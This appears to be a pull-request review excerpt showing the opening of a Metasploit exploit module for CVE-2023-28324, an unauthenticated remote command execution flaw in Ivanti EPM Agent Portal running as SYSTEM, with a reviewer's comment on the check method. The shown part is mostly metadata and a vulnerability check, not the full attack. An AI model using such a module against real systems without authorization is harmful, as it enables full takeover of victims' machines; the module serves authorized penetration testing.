modules/exploits/windows/misc/ivanti_agent_portal_cmdexec.rb

```diff
@@ -0,0 +1,196 @@
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+
+require 'rex/proto/ms_nrtp/client'
+
+class MetasploitModule < Msf::Exploit::Remote
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::Tcp
+
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti EPM Agent Portal Command Execution',
+        'Description' => %q{
+          This module leverages an unauthenticated RCE in Ivanti's EPM Agent Portal where a RPC client can invoke a method
+          which will run an attacker-specified string on the remote target as NT AUTHORITY\SYSTEM.
+        },
+        'Author' => [
+          'James Horseman', # original poc
+          'Zach Hanley', # original poc
+          'Spencer McIntyre' # metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-28324'],
+          ['URL', 'https://github.com/horizon3ai/CVE-2023-28324'],
+        ],
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [ 'Automatic', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-06-30', # NVD publish date
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+
+    register_options([
+      Opt::RPORT()
+    ])
+    deregister_options('SSL')
+  end
+
+  def check
+    cwd = execute_command('echo %cd%', 0)
+    CheckCode::Safe unless cwd.to_s =~ /.:\\Windows\\System32/i
```

Comment:
```suggestion
    return CheckCode::Safe unless cwd.to_s =~ /.:\\Windows\\System32/i
```

Would it also be possible to return some information to the user as to why the service is `safe`?